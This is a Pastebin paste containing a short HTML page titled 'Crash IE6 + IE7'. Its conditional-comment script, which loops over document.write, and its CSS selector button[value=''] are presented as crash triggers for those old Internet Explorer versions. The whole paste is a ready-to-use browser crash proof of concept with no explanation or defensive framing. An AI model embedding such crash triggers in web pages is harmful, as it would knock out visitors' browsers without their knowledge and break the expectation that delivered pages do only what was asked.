Guest User

Untitled

a guest
Jul 16th, 2018
86
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.31 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="utf-8" />
  5. <title>Crash IE6 + IE7</title>
  6. <!--[if IE 6]>
  7. <script>
  8. for (x in document.write) {
  9. document.write(x);
  10. }
  11. </script>
  12. <![endif]-->
  13. <!--[if IE 7]>
  14. <style>
  15. button[value=""]{}
  16. </style>
  17. <![endif]-->
  18. </head>
  19. <body>
  20. This should crash in IE6 + IE7.
  21. </body>
  22. </html>
Add Comment
Please, Sign In to add comment